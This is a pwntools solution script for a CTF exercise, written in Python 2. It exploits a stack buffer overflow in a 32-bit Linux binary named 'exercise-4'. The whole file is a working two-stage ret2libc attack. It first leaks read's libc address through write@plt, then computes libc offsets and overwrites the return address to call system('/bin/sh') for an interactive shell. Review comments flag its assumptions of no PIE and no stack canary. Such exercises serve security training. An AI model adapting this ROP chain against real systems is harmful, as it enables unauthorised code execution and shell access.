soln_exercise-4.py
from pwn import *
# CTF exercise solution written against the Python 2 pwntools API (see the
# .encode("hex") and .next() calls below; they do not exist on Python 3).
# Stage 1 makes the target print the runtime address of read() from its GOT;
# stage 2 turns that leak into a call to system("/bin/sh").
# NOTE(review): every address here is hard-coded or read from the binary's
# static symbol table, which is only valid if the target is not
# position-independent (no PIE/ASLR on the main image) -- confirm with checksec.
context(arch='i386', os='linux') # 32-bit Linux target; also the default for p32()
binary = ELF("exercise-4")
libc = ELF("libc.so.6")  # must be the same libc build the target actually loads, otherwise the offsets below are wrong
write_plt = p32(binary.symbols["write"])      # write@plt, used to print the leak to fd 1
read_GOT = p32(binary.symbols["got.read"])    # address of read's GOT slot (holds read's libc address once resolved)
read_plt = p32(binary.symbols["read"])        # unused in this script
bss_addr = p32(binary.symbols["__bss_start"]) # unused in this script
# Little-endian bytes of 0x0804859d.  Named as a pop/ret gadget; for the chain
# below to fall through to main it has to discard the three write() arguments.
# Which gadget this is cannot be verified from this file alone.
pop_ret = "\x9d\x85\x04\x08"
r=process("./exercise-4")
"""
You can use these to test it as a server over localhost
r=remote("127.0.0.1",1337)
run this in a different terminal VVVV
socat tcp-listen:1337,fork,reuseaddr exec:"strace ./exercise-4"
"""
r.recvline()  # discard one line of output from the target before sending input
# Stage 1: 140 filler bytes up to the saved return address, then a chain that
# calls write(1, read@GOT, 4) -- leaking read's resolved libc address -- and
# returns into main so the program accepts a second input.
# NOTE(review): 140 plain filler bytes reaching the return address implies no
# stack canary protects this frame -- verify against the binary.
exploit = "A"*140
exploit += write_plt +pop_ret + p32(1)+ read_GOT + p32(4)
exploit += p32(binary.symbols["main"])
r.sendline(exploit)
# The 4 leaked bytes are little-endian: reverse, hex-encode, parse as int.
# str.encode("hex") is Python 2 only.
addr_read = int(r.recv(4)[::-1].encode("hex"),16)
r.recvline()  # presumably the line main prints again after being re-entered -- confirm
libc_base = addr_read - libc.symbols["read"]  # leak minus read's offset inside libc
system = p32(libc_base + libc.symbols["system"])
binsh = p32(libc_base + libc.search("/bin/sh").next())  # .next() is the Python 2 iterator API
# Stage 2: return address -> system; "RETN" (0x4e544552) is the placeholder
# system() would return to; the first binsh is system's argument, the second
# is surplus.
# NOTE(review): the filler here is 148, not the 140 used in stage 1.  Nothing
# in this script explains the difference -- presumably main's stack frame is
# laid out differently when re-entered from the ROP chain rather than from
# its original caller; confirm in a debugger before relying on either constant.
r.sendline("A"*148+ system + "RETN" + binsh + binsh)
r.interactive()  # hand the connection to the user